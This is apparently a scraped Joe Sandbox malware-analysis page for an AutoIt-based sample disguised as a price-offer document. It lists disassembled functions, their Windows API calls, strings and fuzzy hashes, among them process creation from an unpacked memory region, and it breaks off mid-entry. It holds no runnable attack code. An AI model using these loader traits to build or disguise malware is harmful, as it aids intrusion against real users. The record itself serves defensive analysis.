Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: ebc2cf361f772e695331cff012712215859b479a36605ba9b1fdf4b575888f95
Instruction ID: a002d815eed88b5eeb78a3a03021ebedf2e478f3c03c678a0822c06b10fe9d2e
Opcode Fuzzy Hash: ebc2cf361f772e695331cff012712215859b479a36605ba9b1fdf4b575888f95
Instruction Fuzzy Hash: C042F13064A341EFD728EF24C844BAAB7E9BF96310F14891AE495873D1D775E845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00982CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00982D07
RegisterClassExW.USER32(00000030), ref: 00982D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00982D42
InitCommonControlsEx.COMCTL32(?), ref: 00982D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00982D6F
LoadIconW.USER32(000000A9), ref: 00982D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00982D94

Strings

+, xrefs: 00982CF0
TaskbarCreated, xrefs: 00982D37
0, xrefs: 00982CE9
AutoIt v3 GUI, xrefs: 00982D23

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 3bd88cec7890456c743c8444193cd7171e8908d50e53988037d15c09cff8bd40
Instruction ID: c60bf2f2a135450e20b5f6d66597f7dd8ff4ebabee5801ab6c57bba46ed07f1e
Opcode Fuzzy Hash: 3bd88cec7890456c743c8444193cd7171e8908d50e53988037d15c09cff8bd40
Instruction Fuzzy Hash: 8921C0B5941318EFDB00DFE4E889BEDBBB8FB08725F00811AF511A62A0D7B14546CF95

Uniqueness

Uniqueness Score: -1.00%

Function 009C065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009C039A: CreateFileW.KERNELBASE(00000000,00000000,?,009C0704,?,?,00000000,?,009C0704,00000000,0000000C), ref: 009C03B7

GetLastError.KERNEL32 ref: 009C076F
__dosmaperr.LIBCMT ref: 009C0776
GetFileType.KERNELBASE(00000000), ref: 009C0782
GetLastError.KERNEL32 ref: 009C078C
__dosmaperr.LIBCMT ref: 009C0795
CloseHandle.KERNEL32(00000000), ref: 009C07B5
CloseHandle.KERNEL32(?), ref: 009C08FF
GetLastError.KERNEL32 ref: 009C0931
__dosmaperr.LIBCMT ref: 009C0938

Strings

H, xrefs: 009C08BD

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 42664477c55d7a3e4acedf21075d90dd8135f1137c68017e636fa588e8f1a614
Instruction ID: 213e79d321ebeb89e91e0c1b92901ae876ecf3b3907c2ce4436f78964ed8a885
Opcode Fuzzy Hash: 42664477c55d7a3e4acedf21075d90dd8135f1137c68017e636fa588e8f1a614
Instruction Fuzzy Hash: DDA1F332E042048FDF19EFA8DC51FAE7BA4AB86320F14415DF8259B291D7359917CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0098344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00983A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A51418,?,00982E7F,?,?,?,00000000), ref: 00983A78

Part of subcall function 00983357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00983379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0098356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009C318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009C31CE
RegCloseKey.ADVAPI32(?), ref: 009C3210
_wcslen.LIBCMT ref: 009C3277
_wcslen.LIBCMT ref: 009C3286

Strings

\, xrefs: 009C328C
\Include\, xrefs: 00983527
Software\AutoIt v3\AutoIt, xrefs: 00983560
Include, xrefs: 009C3184, 009C31C5

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 179ebfc0cf074e17918a6a66b71514e908a298284f2a7717d451d843c2042e93
Instruction ID: 1680ea194c9e0bd0468f87038b395808c9887f6f1f7ab168a878a77a97158090
Opcode Fuzzy Hash: 179ebfc0cf074e17918a6a66b71514e908a298284f2a7717d451d843c2042e93
Instruction Fuzzy Hash: 1571A1714083019EC704EFA5DC81BABBBE8FFD6760F40482EF4459B261EB349A49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00982B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00982B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00982B9D
LoadIconW.USER32(00000063), ref: 00982BB3
LoadIconW.USER32(000000A4), ref: 00982BC5
LoadIconW.USER32(000000A2), ref: 00982BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00982BEF
RegisterClassExW.USER32(?), ref: 00982C40

Part of subcall function 00982CD4: GetSysColorBrush.USER32(0000000F), ref: 00982D07
Part of subcall function 00982CD4: RegisterClassExW.USER32(00000030), ref: 00982D31
Part of subcall function 00982CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00982D42
Part of subcall function 00982CD4: InitCommonControlsEx.COMCTL32(?), ref: 00982D5F
Part of subcall function 00982CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00982D6F
Part of subcall function 00982CD4: LoadIconW.USER32(000000A9), ref: 00982D85
Part of subcall function 00982CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00982D94

Strings

AutoIt v3, xrefs: 00982C2F
0, xrefs: 00982C0F
#, xrefs: 00982C16

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: ce782979b4c1658a07ac46028365972f8e45168724b7c8bde56582ae0ed4b6a4
Instruction ID: badd881b661a347918ceca7c4d2a1c87f43f895edf7c6a77b40d8857cddc525c
Opcode Fuzzy Hash: ce782979b4c1658a07ac46028365972f8e45168724b7c8bde56582ae0ed4b6a4
Instruction Fuzzy Hash: 27214970E40318ABDB50DFE6EC69BA97FB4FB48B65F00415AE500AA6A0D3B10942CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00983170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0098316A,?,?), ref: 009831D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0098316A,?,?), ref: 00983204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00983227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0098316A,?,?), ref: 00983232
CreatePopupMenu.USER32 ref: 00983246
PostQuitMessage.USER32(00000000), ref: 00983267

Strings

TaskbarCreated, xrefs: 0098322D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c4efffd89bd5b1c88c0bbed485c3c445e92e3b4c89adcada16002c8702b20a96
Instruction ID: d68de94d3d924660a72d3310fa093bb9a38a956518a314667e8f53940aac95ee
Opcode Fuzzy Hash: c4efffd89bd5b1c88c0bbed485c3c445e92e3b4c89adcada16002c8702b20a96
Instruction Fuzzy Hash: 4A412435244304AADF15BBB89C1DBBD3A1DFB45F11F04C529F912863E1EBB49A4287A2

Uniqueness

Uniqueness Score: -1.00%

Function 009B8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e621fcaebf173b5f7bb3bb49cf20d4e17b861b2084da9ce1b4494580e1553e
Instruction ID: 29937a0ba75311bdb5150ea1142969c0dcc8a5850072ac8ff84a3cd5777b5bdf
Opcode Fuzzy Hash: c8e621fcaebf173b5f7bb3bb49cf20d4e17b861b2084da9ce1b4494580e1553e
Instruction Fuzzy Hash: C7C1F474904349AFCB11EFE8D945BEEBBB8BF4A320F144199F914A7392C7349942CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02350920 Relevance: 10.7, APIs: 7, Instructions: 185
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02350965

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
Instruction ID: 6547ef8f2843990f7d596494b987f6d4a6b6e3e5a6fe43cc2f98594a20121df3
Opcode Fuzzy Hash: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
Instruction Fuzzy Hash: F671EB75A10218EBDF24DFA4CC95FEEB7B5BF4C700F108558FA09AB280DA759A44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00982C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00982C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00982CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00981CAD,?), ref: 00982CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00981CAD,?), ref: 00982CCF

Strings

edit, xrefs: 00982CAC
AutoIt v3, xrefs: 00982C89, 00982C8E, 00982C8F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 2f65e048e40f4dbd571a7e457ceb7ac6473690313637a234d1f72b38099bb396
Instruction ID: 09ac8ab778c2f6351f0d8737dcec99fe8f2327c8aa8dfc1773919084b19c43c6
Opcode Fuzzy Hash: 2f65e048e40f4dbd571a7e457ceb7ac6473690313637a234d1f72b38099bb396
Instruction Fuzzy Hash: 26F03A795803907AEB708793AC1CFB72EBDE7C6F71F01401AF900AA5B0D2610842DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 009F2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009F2C05
DeleteFileW.KERNEL32(?), ref: 009F2C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009F2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009F2CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009F2CC0

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: c7e49cd96ab704d9005288268cbb67a7744d7864902e9dedc4eca765f63de64a
Instruction ID: db5c590cd4916086a1736d80a31349c064743f4d84c39ad3e7cb769c71c23f54
Opcode Fuzzy Hash: c7e49cd96ab704d9005288268cbb67a7744d7864902e9dedc4eca765f63de64a
Instruction Fuzzy Hash: D1B12D7290111DABDF11EFA4CC85FEEBB7DEF89350F1040A6F609E6151EA349A448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02352410 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 167
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02352300: Sleep.KERNELBASE(000001F4), ref: 02352311

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02352577

Strings

XLXZ1IR0HKHUPFGUYOXEKH85OPEJN, xrefs: 023525FA, 023525FD

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateFileSleep
String ID: XLXZ1IR0HKHUPFGUYOXEKH85OPEJN
API String ID: 2694422964-394871721
Opcode ID: 29f0ec129c112a50c8ad1fa3e2c5f3f482aa89d0368b8ba039930812b492817e
Instruction ID: e93445b055d7ff27b50505856408f320e4eace9cd1e2d82ebf4afc207bec8400
Opcode Fuzzy Hash: 29f0ec129c112a50c8ad1fa3e2c5f3f482aa89d0368b8ba039930812b492817e
Instruction Fuzzy Hash: AC71A630D0429CDAEF11DBB4C854BEFBBB5AF15304F044199EA487B2C1D7B91A49CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00983B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00983B0F,SwapMouseButtons,00000004,?), ref: 00983B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00983B0F,SwapMouseButtons,00000004,?), ref: 00983B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00983B0F,SwapMouseButtons,00000004,?), ref: 00983B83

Strings

Control Panel\Mouse, xrefs: 00983B3E

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 7e35d246d8edee291c3b699eabee9c99b980b7a9f49bf2e7ba48aed96d286a17
Instruction ID: d2e7fd06a1e2244991fea19a49684231b4832544c2af3367a42ba2ff532d1706
Opcode Fuzzy Hash: 7e35d246d8edee291c3b699eabee9c99b980b7a9f49bf2e7ba48aed96d286a17
Instruction Fuzzy Hash: 02112AB5510208FFDB20DFA5DC44AFEB7BCEF04B94B108959A805D7210E2319F419B60

Uniqueness

Uniqueness Score: -1.00%

Function 0098DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009D32B7

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 631aa4a44caac55d832aebaded21327b1806e2837988296d4e7788383a15d7fd
Instruction ID: a927caba3451c9947710eb344c2e01ddd275639f7041221442fa14dc3fb48100
Opcode Fuzzy Hash: 631aa4a44caac55d832aebaded21327b1806e2837988296d4e7788383a15d7fd
Instruction Fuzzy Hash: 61C2AD71A00205CFCB24EF98C8A0BADB7B5FF49310F24856AE916AB391D375ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00983923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009C33A2

Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00983A04

Strings

Line: , xrefs: 009C33EB

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: ddc83f4c6ebb750faccdecce8879ba3c437099899f34c40d5f3e8d2611a62226
Instruction ID: 8440b27f93c684c4f6888cf1139866b9007cc40c3b3d8da7b0cf9a890ad43002
Opcode Fuzzy Hash: ddc83f4c6ebb750faccdecce8879ba3c437099899f34c40d5f3e8d2611a62226
Instruction Fuzzy Hash: 3F31A171408300AAD725FB60DC45BEBB7DCAB80B20F00892EF59997291EB749A49C7C2

Uniqueness

Uniqueness Score: -1.00%

Function 0099FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 009A0668

Part of subcall function 009A32A4: RaiseException.KERNEL32(?,?,?,009A068A,?,00A51444,?,?,?,?,?,?,009A068A,00981129,00A48738,00981129), ref: 009A3304

__CxxThrowException@8.LIBVCRUNTIME ref: 009A0685

Strings

Unknown exception, xrefs: 009A0692

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 87cbfba4a1a9638a6e3a921658d642bde371158ff47135c1afc013e2791606de
Instruction ID: 877ea1f27790be1ade6ea011a2a473e2c12b35b19bc1233ee1156dcfb12a507b
Opcode Fuzzy Hash: 87cbfba4a1a9638a6e3a921658d642bde371158ff47135c1afc013e2791606de
Instruction Fuzzy Hash: D2F0F634D0020D77CF00B6A8E856E9EB76C6EC2354B604531B828D65D1EF71EA65C5C0

Uniqueness

Uniqueness Score: -1.00%

Function 02351060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 023510A5
ExitProcess.KERNEL32(00000000), ref: 023510C4

Strings

D, xrefs: 02351071

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
Instruction ID: 60fe14b1f9241c6039b5273b244c576175b1779efcb7ded99bbcd25361275dc9
Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
Instruction Fuzzy Hash: 21F0EC7194025CABDB60EFE0CC49FEE77BCBF04701F008518BE4A9B180DA7496088B61

Uniqueness

Uniqueness Score: -1.00%

Function 009F3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 009F302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009F3044

Strings

aut, xrefs: 009F3038

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 93ed60f92d95c2a5b0d0c6e7980a351a1dbd11fb816d7ec1e911b1d04289380c
Instruction ID: 9a1b68961e416a6b26187e4b75ffeb5dd950e09ec3240808dc00bb8c3de4cf53
